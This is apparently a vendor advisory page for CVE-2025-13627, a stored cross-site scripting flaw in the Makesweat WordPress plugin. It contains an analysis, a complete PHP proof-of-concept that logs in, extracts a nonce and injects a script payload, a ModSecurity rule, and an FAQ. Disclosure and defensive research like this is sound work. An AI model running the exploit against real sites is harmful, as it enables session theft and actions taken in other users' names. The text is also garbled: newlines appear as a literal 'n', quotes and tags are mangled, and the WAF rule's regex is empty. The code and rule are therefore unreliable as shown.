{
“analysis”: “Atomic Edge analysis of CVE-2025-13627 (metadata-based):nThis vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Makesweat WordPress plugin version 0.1. The vulnerability exists within the plugin’s ‘makesweat_clubid’ setting. Attackers with administrator-level privileges or higher can inject malicious scripts that persist and execute when affected pages are loaded.nnAtomic Edge research indicates the root cause is insufficient input sanitization and output escaping. The plugin likely accepts user-supplied input for the ‘makesweat_clubid’ setting without proper validation or sanitization. It then stores this input and later outputs it to a page without adequate escaping. This inference is based on the CWE-79 classification and the vulnerability description. Without a code diff, this conclusion is derived from the standard pattern for stored XSS in WordPress plugins.nnExploitation requires an attacker to have an administrator account on the target WordPress site. The attacker would navigate to the plugin’s settings page, likely located at /wp-admin/admin.php?page=makesweat or a similar administrative interface. They would then submit a malicious payload in the ‘makesweat_clubid’ parameter. A typical payload would be a JavaScript payload like alert(document.domain). Upon saving the settings, the payload is stored. The script executes whenever a user, including lower-privileged users, accesses a front-end or back-end page that echoes this unsanitized setting.nnRemediation requires implementing proper security functions. The plugin must sanitize the ‘makesweat_clubid’ input on receipt using a function like sanitize_text_field(). It must also escape the output on render using a function like esc_attr() for HTML attributes or esc_html() for text nodes. A proper patch would apply these functions to all instances where the setting is retrieved and displayed. The lack of a patched version indicates the plugin may be abandoned.nnThe impact of successful exploitation is limited by the high privilege requirement. An attacker with administrator access already has extensive control over the site. However, this vulnerability allows for persistent script execution in the context of other users’ sessions. This could be used to steal session cookies, perform actions on behalf of other administrators, or deface the site. The stored nature means the attack persists across sessions until the malicious setting is removed.”,
“poc_php”: “// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2025-13627 – Makesweat <= 0.1 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'makesweat_clubid' Settingn<?phpn// CONFIGURATIONn$target_url = 'https://example.com'; // Base URL of the target WordPress siten$username = 'admin'; // Administrator usernamen$password = 'password'; // Administrator passwordn$payload = 'alert(“Atomic Edge XSS Test: “+document.domain)’; // XSS payloadnn// ASSUMPTIONS:n// 1. The plugin settings are saved via a standard WordPress admin POST request.n// 2. The ‘makesweat_clubid’ parameter is submitted to an admin page, likely under a ‘makesweat’ menu slug.n// 3. The request requires a valid WordPress nonce and administrator authentication cookies.nn$ch = curl_init();ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_COOKIEJAR, ‘/tmp/cookies.txt’);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cookies.txt’);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);nn// Step 1: Authenticate to WordPress and obtain nonce from the plugin’s settings page.n// Fetch the login page to get the login nonce (log).ncurl_setopt($ch, CURLOPT_URL, $target_url . ‘/wp-login.php’);n$login_page = curl_exec($ch);nnpreg_match(‘/name=”log” value=”([^”]*)”/’, $login_page, $log_match);n$log_nonce = $log_match[1] ?? ”;nn// Perform login.n$login_data = http_build_query([n ‘log’ => $username,n ‘pwd’ => $password,n ‘wp-submit’ => ‘Log In’,n ‘redirect_to’ => $target_url . ‘/wp-admin/’,n ‘testcookie’ => ‘1’n]);nncurl_setopt($ch, CURLOPT_URL, $target_url . ‘/wp-login.php’);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);n$login_response = curl_exec($ch);nn// Step 2: Access the Makesweat plugin settings page to find the update nonce.n// Assume the settings page slug is ‘makesweat’.ncurl_setopt($ch, CURLOPT_URL, $target_url . ‘/wp-admin/admin.php?page=makesweat’);ncurl_setopt($ch, CURLOPT_POST, false);n$settings_page = curl_exec($ch);nn// Extract the nonce for the ‘update’ action. WordPress often uses ‘_wpnonce’.npreg_match(‘/name=”_wpnonce” value=”([^”]*)”/’, $settings_page, $nonce_match);n$update_nonce = $nonce_match[1] ?? ”;nnif (empty($update_nonce)) {n die(‘Could not extract security nonce from settings page. The page structure may differ.’);n}nn// Step 3: Submit the malicious payload to the settings update handler.n// Assume the form submits to admin-post.php or the same admin.php page.n$exploit_data = http_build_query([n ‘action’ => ‘update’,n ‘makesweat_clubid’ => $payload,n ‘_wpnonce’ => $update_nonce,n ‘_wp_http_referer’ => ‘/wp-admin/admin.php?page=makesweat’n]);nncurl_setopt($ch, CURLOPT_URL, $target_url . ‘/wp-admin/admin-post.php’);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, $exploit_data);n$exploit_response = curl_exec($ch);nn// Check for success.nif (strpos($exploit_response, ‘Settings saved’) !== false || curl_getinfo($ch, CURLINFO_HTTP_CODE) == 302) {n echo “[+] Payload likely injected. Visit any page that outputs the ‘makesweat_clubid’ setting to trigger XSS.\n”;n} else {n echo “[-] Exploit may have failed. Manual verification required.\n”;n}nncurl_close($ch);n?>”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2025-13627 (metadata-based)nSecRule REQUEST_URI “@streq /wp-admin/admin-post.php” \n “id:202513627,phase:2,deny,status:403,chain,msg:’CVE-2025-13627 via Makesweat plugin stored XSS’,severity:’CRITICAL’,tag:’CVE-2025-13627′,tag:’WordPress’,tag:’Makesweat’,tag:’XSS'”n SecRule ARGS_POST:action “@streq update” “chain”n SecRule ARGS_POST:makesweat_clubid “@rx []”
}
CVE-2025-13627: Makesweat <= 0.1 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'makesweat_clubid' Setting (makesweat)
CVE-2025-13627
makesweat
0.1
—
Analysis Overview
Differential between vulnerable and patched code
Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
Frequently Asked Questions
What is CVE-2025-13627?
Overview of the vulnerabilityCVE-2025-13627 is a stored cross-site scripting (XSS) vulnerability in the Makesweat plugin for WordPress, affecting versions up to and including 0.1. It allows authenticated users with administrator-level access to inject malicious scripts via the ‘makesweat_clubid’ setting, which are executed when other users access affected pages.
How does the vulnerability work?
Mechanism of exploitationThe vulnerability arises from insufficient input sanitization and output escaping in the Makesweat plugin. An attacker with administrator privileges can submit a malicious payload in the ‘makesweat_clubid’ parameter, which is then stored and executed when users load pages that output this unsanitized data.
Who is affected by this vulnerability?
Identifying vulnerable usersAny WordPress site using the Makesweat plugin version 0.1 or earlier is affected. Specifically, this vulnerability impacts authenticated users with administrator access, as they can exploit the flaw to inject scripts.
How can I check if my site is vulnerable?
Steps to identify exposureTo check if your site is vulnerable, verify if the Makesweat plugin is installed and its version. If it is version 0.1 or earlier, your site is at risk. Additionally, review your site’s settings for any unauthorized changes to the ‘makesweat_clubid’ parameter.
What are the potential risks of exploitation?
Understanding the impactIf exploited, this vulnerability can lead to persistent script execution in the context of other users’ sessions. This could allow attackers to steal session cookies, perform actions on behalf of other users, or deface the site, significantly compromising site security.
How can I fix the vulnerability?
Remediation stepsTo remediate this vulnerability, update the Makesweat plugin to a patched version if available. If no patch exists, you should consider disabling the plugin or implementing custom code to sanitize the ‘makesweat_clubid’ input and escape its output.
What does a CVSS score of 4.4 mean?
Interpreting the severity ratingA CVSS score of 4.4 indicates a medium severity level for this vulnerability. This suggests that while the vulnerability requires specific conditions to be exploited, it poses a significant risk to the affected systems, particularly due to the potential for persistent XSS attacks.
What is stored cross-site scripting (XSS)?
Definition and implicationsStored cross-site scripting (XSS) occurs when an attacker is able to inject malicious scripts into a web application, which are then stored on the server. These scripts are executed in the browsers of users who access the affected pages, potentially leading to data theft or unauthorized actions.
How does the proof of concept demonstrate the vulnerability?
Understanding the demonstrationThe proof of concept provided illustrates how an attacker can authenticate as an administrator, navigate to the Makesweat settings, and submit a malicious payload. It shows the necessary HTTP requests to exploit the vulnerability, effectively demonstrating how the XSS can be triggered.
What is the recommended approach if I cannot update the plugin?
Alternative mitigation strategiesIf you cannot update the Makesweat plugin, consider disabling it or implementing web application firewall rules to block the exploitation attempts. Additionally, regularly monitor your site for unusual activity and review user permissions to limit access.
What is the significance of the CWE-79 classification?
Understanding the classificationCWE-79 refers to improper neutralization of input during web page generation, which is the root cause of XSS vulnerabilities. This classification highlights the importance of sanitizing and escaping user input to prevent script injections.
How can I protect my WordPress site from similar vulnerabilities?
Best practices for securityTo protect your WordPress site, regularly update all plugins and themes, use security plugins to monitor for vulnerabilities, and implement strong user access controls. Additionally, conduct periodic security audits to identify and mitigate potential risks.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
